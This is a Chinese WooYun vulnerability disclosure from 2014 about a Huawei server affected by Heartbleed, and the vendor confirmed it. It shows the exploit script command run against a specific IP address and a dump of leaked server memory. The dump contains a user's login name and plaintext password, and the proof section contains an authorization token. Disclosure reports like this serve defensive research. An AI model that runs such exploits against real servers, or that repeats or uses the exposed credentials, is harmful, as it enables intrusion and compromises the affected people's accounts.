漏洞概要关注数(13)关注此漏洞

漏洞概要
关注数(
13
)
关注此漏洞
缺陷编号：
WooYun-2014-86687
漏洞标题：		华为某重要服务器存在心脏滴血漏洞可以查看密码
相关厂商：
华为技术有限公司
漏洞作者：
杀器王子
提交时间：		2014-12-10 18:21
公开时间：		2015-01-24 18:22
漏洞类型：		应用配置错误
危害等级：		高
自评Rank：		15
漏洞状态：		
															厂商已经确认
漏洞来源：
http://www.wooyun.org
Tags标签：
第三方不可信程序
配置错误
2
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-10：	细节已通知厂商并且等待厂商处理中
2014-12-10：	厂商已经确认，细节仅向厂商公开
2014-12-20：	细节向核心白帽子及相关领域专家公开
2014-12-30：	细节向普通白帽子公开
2015-01-09：	细节向实习白帽子公开
2015-01-24：	细节向公众公开
简要描述：
杀器发现
详细说明：
code 区域
python openssl.py 119.145.14.47 443|more
[{"type": 0, "description": "IP:119.145.14.47:443<br>\u5b58\u5728openssl \u4fe1\
u606f\u6cc4\u9732\uff1a <br>\n.@....SC[...r....+..H...9........w.3....f.....\".!
.9.8.........5.............................3.2.....E.D...../...A................
.................I...........4.2................................................
...#.......PF..G.. iPhone OS8.1..x-device-name: iPhone..x-device-type: ios..x-cl
ient-version: V2.2.0.210..Content-Length: 85....{.   \"appId\" : \"espace\",.
\"loginName\" : \"x00246451\",.   \"password\" : \"whXF07!@\".}......$.0;i......
.3m..............|\".i.8...pf,.C.....O.q+B.....b............................,Mp*
v.a.......(&W.A..f..........ding: gzip, deflate.......*....?.lr....>N.i..}i.|..&
..z...............4NU01...9.e.....CwK&o..Cq:)...J.....vln..;...\\..%.mu.F..#....
..az.F.....l...=(...@..4.Y...........dS.@..c........M.X.8.W.wTE.x.....vl..'mcX*D
.y..j.......g.x.. ....<.......8....<.......8....<.......8....<.......8....<.....
..8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......
8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8.
...<.......8....<.......8....<.......8....<.......8....<.......8....<.......8...
.<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<
.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<..
.....8....<.......8....<.......8....<.......8....<.......8....<.......8....<....
...8....<.......8....<.......8....<.......8....<.......8....<.......8....<......
.8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8
....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8..
..<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....
<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.
漏洞证明：
code 区域
GET /api/v2/serverurl?type=ufm HTTP/1.1..Host: onebox.huawei.co
m..Accept: */*..Authorization:OneBox/07f75bdb7fae12829423283ffade15ef..Content-T
ype:application/json
修复方案：
版权声明：转载请注明来源
杀器王子
@
乌云
漏洞回应
厂商回应：
危害等级：高
漏洞Rank：15
确认时间：2014-12-10 19:37
厂商回复：
感谢白帽子关注。已通知立刻整改。
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分